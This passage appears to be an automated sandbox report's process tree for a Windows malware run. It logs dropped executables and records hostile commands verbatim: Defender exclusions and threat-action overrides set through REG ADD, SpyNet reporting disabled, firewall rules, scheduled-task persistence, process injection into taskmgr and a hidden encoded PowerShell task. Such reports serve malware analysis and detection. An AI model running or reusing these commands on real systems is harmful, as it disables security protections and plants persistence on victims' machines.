- Suspicious use of AdjustPrivilegeToken
PID:1244

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4888

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 2468
4⤵
- Program crash
PID:1740

C:\Users\Admin\Documents\GuardFox\XR9aCbvSeH0PNmiOfR0DyV7v.exe
"C:\Users\Admin\Documents\GuardFox\XR9aCbvSeH0PNmiOfR0DyV7v.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:4092

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:448

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
PID:3796

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
5⤵
- Modifies Windows Firewall
PID:388

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2580

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:228

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
PID:456

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3152

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Creates scheduled task(s)
PID:3080

C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
5⤵
PID:4980

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Drops file in System32 directory
PID:688

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:716

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
- Executes dropped EXE
PID:2096

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Creates scheduled task(s)
PID:3672

C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
5⤵
- Executes dropped EXE
PID:4752

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
6⤵
PID:4888

C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
7⤵
- Launches sc.exe
PID:3100

C:\Users\Admin\Documents\GuardFox\jsinW_BETWxrFBeb1xXIjCeh.exe
"C:\Users\Admin\Documents\GuardFox\jsinW_BETWxrFBeb1xXIjCeh.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:868

C:\Users\Admin\AppData\Local\Temp\7zSB40E.tmp\Install.exe
.\Install.exe /CLupdidemf "525403" /S
3⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
PID:4904

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
4⤵
PID:1200

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
5⤵
PID:4192

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
6⤵
PID:4400

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
6⤵
PID:4412

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
4⤵
PID:4552

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
5⤵
PID:1380

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
6⤵
PID:3484

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
6⤵
PID:1648

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gmdisvdmh" /SC once /ST 09:20:25 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
4⤵
- Creates scheduled task(s)
PID:448

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gmdisvdmh"
4⤵
PID:3428

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gmdisvdmh"
4⤵
PID:2244

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "btbwILgIDOMomJfKYB" /SC once /ST 19:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\dYCYYvmNvBRqgTGOH\lchhETiXYelTvPX\XqppFsW.exe\" RD /nMsite_idkjt 525403 /S" /V1 /F
4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4264

C:\Users\Admin\Documents\GuardFox\WYPUIGgN6vuEmknhIqzgRSQb.exe
"C:\Users\Admin\Documents\GuardFox\WYPUIGgN6vuEmknhIqzgRSQb.exe"
2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
PID:884

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:368

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:3616

C:\Users\Admin\Documents\GuardFox\WYPUIGgN6vuEmknhIqzgRSQb.exe
"C:\Users\Admin\Documents\GuardFox\WYPUIGgN6vuEmknhIqzgRSQb.exe"
3⤵
- Executes dropped EXE
PID:4916

C:\Users\Admin\Documents\GuardFox\smTf9RkOSDoC4v5y22bl3fvg.exe
"C:\Users\Admin\Documents\GuardFox\smTf9RkOSDoC4v5y22bl3fvg.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:4304

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
3⤵
PID:3136

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:3484

C:\Users\Admin\Documents\GuardFox\l8l9RRY3_DDsTnswn30f44qI.exe
"C:\Users\Admin\Documents\GuardFox\l8l9RRY3_DDsTnswn30f44qI.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1864

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:4964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4964 -s 2084
4⤵
- Program crash
PID:4540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1864 -s 792
3⤵
- Program crash
PID:4688

C:\Users\Admin\Documents\GuardFox\7_yhNfarqM1lgLovwKi2qclO.exe
"C:\Users\Admin\Documents\GuardFox\7_yhNfarqM1lgLovwKi2qclO.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4196

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:5000

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3352

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4196 -s 792
3⤵
- Program crash
PID:4752

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:1956

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:3372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2036 -ip 2036
1⤵
PID:612

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1864 -ip 1864
1⤵
PID:4384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4196 -ip 4196
1⤵
PID:1292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4460 -ip 4460
1⤵
PID:5000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:748

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:5000

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:2076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4888 -ip 4888
1⤵
PID:3692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4964 -ip 4964
1⤵
PID:4480

C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4068

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
2⤵
PID:1556

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1616

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
2⤵
PID:3164

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
2⤵
PID:228

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
2⤵
PID:2388

C:\Windows\system32\svchost.exe
svchost.exe
2⤵
PID:3796

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:4384

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:3960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4164 -ip 4164
1⤵
PID:1264

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1616

C:\Users\Admin\AppData\Local\Temp\dYCYYvmNvBRqgTGOH\lchhETiXYelTvPX\XqppFsW.exe
C:\Users\Admin\AppData\Local\Temp\dYCYYvmNvBRqgTGOH\lchhETiXYelTvPX\XqppFsW.exe RD /nMsite_idkjt 525403 /S
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:2444

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4388

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:2792

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:4304

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:4820

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:4148

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:3332

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:2364

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:1120

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:116

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:4164

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
3⤵
PID:4528

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
3⤵
PID:2848

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:1724

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:4616

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:4696

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:2288

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:1604

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:3900

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:1300

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:4848

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:1492

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:4196

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:4240

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
PID:4288

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
3⤵
PID:2504

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
3⤵
PID:2092

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
3⤵
PID:4724

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
3⤵
PID:4504

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
3⤵
PID:4908

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
3⤵
PID:3992

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JqMoIWPtRqoDC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JqMoIWPtRqoDC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KuTytnbkU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KuTytnbkU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PSjUbWBFcPUKufSEFkR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PSjUbWBFcPUKufSEFkR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UotyJsAgSFUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UotyJsAgSFUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iyzAqDqghgpU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iyzAqDqghgpU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\dTRdFhcsEOtGTQVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" 